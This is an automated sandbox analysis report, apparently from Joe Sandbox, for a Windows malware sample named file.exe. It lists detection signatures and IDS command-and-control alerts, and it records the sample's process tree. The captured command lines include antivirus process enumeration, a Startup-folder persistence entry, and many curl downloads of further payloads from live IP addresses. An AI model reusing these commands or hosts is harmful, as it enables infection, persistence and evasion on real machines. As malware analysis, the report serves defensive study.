Edit tour
Windows
Analysis Report
file.exe
Overview
General Information
| Sample name: | file.exe |
| Analysis ID: | 1561834 |
| MD5: | c938c02a19091a3acd044001631692c8 |
| SHA1: | 681e661b16ae2bebce2ef18facb86de6fd727cae |
| SHA256: | e090769b89bee3e8ab4a316355fab8da61f629b0eee9da37c0ac312bdc20aad8 |
| Tags: | exeuser-Bitsight |
| Infos: |  |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sigma detected: Copy itself to suspicious location via type command
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Drops PE files with a suspicious file extension
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes many files with high entropy
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Recon Command Output Piped To Findstr.EXE
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Too many similar processes found
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
file.exe (PID: 3160 cmdline: "C:\Users\ user\Deskt op\file.ex e" MD5: C938C02A19091A3ACD044001631692C8) 
cmd.exe (PID: 4440 cmdline: "C:\Window s\System32 \cmd.exe" /c copy Fe eling Feel ing.cmd && Feeling.c md MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3148 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
tasklist.exe (PID: 1472 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1) - findstr.exe (PID: 5548 cmdline:
findstr /I "wrsa ops svc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - tasklist.exe (PID: 6476 cmdline:
tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1) - findstr.exe (PID: 1372 cmdline:
findstr "A vastUI AVG UI bdservi cehost nsW scSvc ekrn SophosHea lth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - cmd.exe (PID: 2636 cmdline:
cmd /c md 768032 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - cmd.exe (PID: 3576 cmdline:
cmd /c cop y /b ..\Ho ward + ..\ Los + ..\B ecome + .. \Mental + ..\Vermont + ..\Bt + ..\Vatica n G MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) 
Finish.com (PID: 5544 cmdline: Finish.com G MD5: 62D09F076E6E0240548C2F837536A46A) - cmd.exe (PID: 6004 cmdline:
cmd /k ech o [Interne tShortcut] > "C:\Use rs\user\Ap pData\Roam ing\Micros oft\Window s\Start Me nu\Program s\Startup\ InnoSphere .url" & ec ho URL="C: \Users\use r\AppData\ Local\Inno Sphere Dyn amics\Inno Sphere.js" >> "C:\Us ers\user\A ppData\Roa ming\Micro soft\Windo ws\Start M enu\Progra ms\Startup \InnoSpher e.url" & e xit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1440 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 5356 cmdline:
"C:\Window s\System32 \cmd.exe" /C WMIC /N ode:localh ost /Names pace:\\roo t\Security Center2 Pa th AntiVir usProduct Get displa yName > C: \Users\use r\AppData\ Local\temp \407 2>&1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 4320 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
WMIC.exe (PID: 6176 cmdline: WMIC /Node :localhost /Namespac e:\\root\S ecurityCen ter2 Path AntiVirusP roduct Get displayNa me MD5: E2DE6500DE1148C7F6027AD50AC8B891) - cmd.exe (PID: 3304 cmdline:
"C:\Window s\System32 \cmd.exe" /C type C: \Users\use r\AppData\ Local\temp \407 > C:\ Users\user \AppData\L ocal\temp\ 403 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6616 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 5524 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\te wjy" "178. 215.224.25 2/v10/ukyh .php?jspo= 6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1396 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Conhost.exe (PID: 356 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 6784 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\tewjy " "178.215 .224.252/v 10/ukyh.ph p?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - Conhost.exe (PID: 1088 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Conhost.exe (PID: 6460 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 2680 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\si hmk" "178. 215.224.74 /v10/ukyh. php?jspo=6 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6660 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 7056 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\sihmk " "178.215 .224.74/v1 0/ukyh.php ?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 6496 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\ek cal" "178. 215.224.74 /v10/ukyh. php?jspo=5 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6508 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 4952 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\ekcal " "178.215 .224.74/v1 0/ukyh.php ?jspo=5" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - Conhost.exe (PID: 5276 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Conhost.exe (PID: 528 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 5492 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\vu evs" "178. 215.224.74 /v10/ukyh. php?jspo=6 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5276 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 3712 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\vuevs " "178.215 .224.74/v1 0/ukyh.php ?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 5712 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\fs qyf" "178. 215.224.74 /v10/ukyh. php?jspo=6 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3536 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 5632 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\fsqyf " "178.215 .224.74/v1 0/ukyh.php ?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 6620 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\dm gfe" "178. 215.224.74 /v10/ukyh. php?jspo=3 5&xvgj=YXp 2dy5leGU%3 D" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 4824 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Conhost.exe (PID: 6000 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 6948 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\dmgfe " "178.215 .224.74/v1 0/ukyh.php ?jspo=35&x vgj=YXp2dy 5leGU%3D" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 5476 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\wo ejq" "178. 215.224.74 /v10/ukyh. php?jspo=6 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6676 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 3580 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\woejq " "178.215 .224.74/v1 0/ukyh.php ?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 4428 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\xv way" "178. 215.224.74 /v10/ukyh. php?jspo=6 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 4280 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 5620 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\xvway " "178.215 .224.74/v1 0/ukyh.php ?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 6252 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\tl bry" "178. 215.224.74 /v10/ukyh. php?jspo=3 5&xvgj=eGh 3cS56aXA%3 D" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 4980 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 7128 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\tlbry " "178.215 .224.74/v1 0/ukyh.php ?jspo=35&x vgj=eGh3cS 56aXA%3D" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 6784 cmdline:
"C:\Window s\System32 \cmd.exe" /C cd "C:\ Users\user \AppData\R oaming\Dol phinDumps" & azvw.ex e -o xhwq. zip MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 2364 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - azvw.exe (PID: 2380 cmdline:
azvw.exe - o xhwq.zip MD5: 75375C22C72F1BEB76BEA39C22A1ED68) - cmd.exe (PID: 2296 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\si rxu" "178. 215.224.74 /v10/ukyh. php?jspo=6 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3440 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 3996 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\sirxu " "178.215 .224.74/v1 0/ukyh.php ?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - Conhost.exe (PID: 4752 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 1288 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\gt nez" "178. 215.224.74 /v10/ukyh. php?jspo=3 1" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1772 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 4524 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\gtnez " "178.215 .224.74/v1 0/ukyh.php ?jspo=31" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 6588 cmdline:
"C:\Window s\System32 \cmd.exe" /C systemi nfo | find str /C:"OS Name" > C :\Users\us er\AppData \Roaming\D olphinDump s\jvx 2>&1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 736 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Conhost.exe (PID: 3344 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - systeminfo.exe (PID: 5808 cmdline:
systeminfo MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5) - WmiPrvSE.exe (PID: 5700 cmdline:
C:\Windows \sysWOW64\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 64ACA4F48771A5BA50CD50F2410632AD) - Conhost.exe (PID: 6608 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Conhost.exe (PID: 5700 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - findstr.exe (PID: 2884 cmdline:
findstr /C :"OS Name" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - cmd.exe (PID: 5500 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\gf dap" "178. 215.224.74 /v10/ukyh. php?jspo=6 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 2764 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 3224 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\gfdap " "178.215 .224.74/v1 0/ukyh.php ?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 2136 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\gj mcf" "178. 215.224.74 /v10/ukyh. php?jspo=6 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1560 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 1496 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\gjmcf " "178.215 .224.74/v1 0/ukyh.php ?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 3040 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\lk ufr" "178. 215.224.74 /v10/ukyh. php?jspo=7 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1536 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 4276 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\lkufr " "178.215 .224.74/v1 0/ukyh.php ?jspo=7" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 768 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\sl pug" "178. 215.224.74 /v10/ukyh. php?jspo=6 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6220 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 6604 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\slpug " "178.215 .224.74/v1 0/ukyh.php ?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - Conhost.exe (PID: 6472 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Conhost.exe (PID: 6076 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7056 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\ix hzf" "178. 215.224.74 /v10/ukyh. php?jspo=1 0&melq=1" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6816 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 6976 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\ixhzf " "178.215 .224.74/v1 0/ukyh.php ?jspo=10&m elq=1" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 4760 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\qh iwq" "178. 215.224.74 /v10/ukyh. php?jspo=6 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6532 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 6160 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\qhiwq " "178.215 .224.74/v1 0/ukyh.php ?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 4440 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\yp alg" "178. 215.224.74 /v10/ukyh. php?jspo=6 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - cmd.exe (PID: 2516 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\cb maa" "178. 215.224.74 /v10/ukyh. php?jspo=3 5&xvgj=UmV 2ZW51ZURld mljZXMuZXh l" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3160 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 5560 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\cbmaa " "178.215 .224.74/v1 0/ukyh.php ?jspo=35&x vgj=UmV2ZW 51ZURldmlj ZXMuZXhl" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - Conhost.exe (PID: 6720 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
RevenueDevices.exe (PID: 4012 cmdline: "C:\Users\ user\AppDa ta\Local\t emp\Revenu eDevices.e xe" MD5: B487B5B51436B42576D60A1FE58F8399) - cmd.exe (PID: 1336 cmdline:
"C:\Window s\System32 \cmd.exe" /c copy Se ek Seek.cm d & Seek.c md MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3208 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 4292 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\hz paz" "178. 215.224.74 /v10/ukyh. php?jspo=6 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 4024 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 3772 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\hzpaz " "178.215 .224.74/v1 0/ukyh.php ?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 1380 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\fx hyo" "178. 215.224.74 /v10/ukyh. php?gi" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1652 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Conhost.exe (PID: 6680 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 3876 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\fxhyo " "178.215 .224.74/v1 0/ukyh.php ?gi" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - Conhost.exe (PID: 428 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 3380 cmdline:
"C:\Window s\System32 \cmd.exe" /C curl -s -o "C:\Us ers\user\A ppData\Loc al\temp\jo cox" "178. 215.224.74 /v10/ukyh. php?jspo=6 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3792 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 6064 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\jocox " "178.215 .224.74/v1 0/ukyh.php ?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - Conhost.exe (PID: 3136 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - choice.exe (PID: 5540 cmdline:
choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4) - conhost.exe (PID: 7120 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 1848 cmdline:
curl -s -o "C:\Users \user\AppD ata\Local\ temp\ypalg " "178.215 .224.74/v1 0/ukyh.php ?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - Conhost.exe (PID: 5620 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
wscript.exe (PID: 5592 cmdline: "C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Loc al\InnoSph ere Dynami cs\InnoSph ere.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - InnoSphere.scr (PID: 2676 cmdline:
"C:\Users\ user\AppDa ta\Local\I nnoSphere Dynamics\I nnoSphere. scr" "C:\U sers\user\ AppData\Lo cal\InnoSp here Dynam ics\l" MD5: 62D09F076E6E0240548C2F837536A46A)
- cleanup
⊘No configs have been found
⊘No yara matches
Spreading |   |
|---|
| Source: | Author: Joe Security: | ||
System Summary | |
|---|
| Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: | ||
| Source: | Author: Nasreddine Bencherchali (Nextron Systems), frack113: | ||
| Source: | Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: | ||
| Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: frack113: | ||
| Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: | ||
| Source: | Author: Michael Haag: | ||
Data Obfuscation | |
|---|
| Source: | Author: Joe Security: | ||
HIPS / PFW / Operating System Protection Evasion | |
|---|
| Source: | Author: Joe Security: | ||
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-11-24T12:05:21.959147+0100 | 2853767 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49864 | 178.215.224.74 | 80 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-11-24T12:05:21.959147+0100 | 2853768 | 1 | A Network Trojan was detected | 192.168.2.5 | 49864 | 178.215.224.74 | 80 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection | |
|---|
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | ReversingLabs: | ||
| Source: | Joe Sandbox ML: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Binary string: | ||
| Source: | Code function: | 0_2_00406301 | |
| Source: | Code function: | 0_2_00406CC7 | |
| Source: | Code function: | 52_2_0041C29C | |
| Source: | Code function: | 52_2_004107A0 | |
| Source: | Code function: | 88_2_004062D5 | |
| Source: | Code function: | 88_2_00402E18 | |
| Source: | Code function: | 88_2_00406C9B | |
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
Networking | |
|---|
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | IP Address: | ||
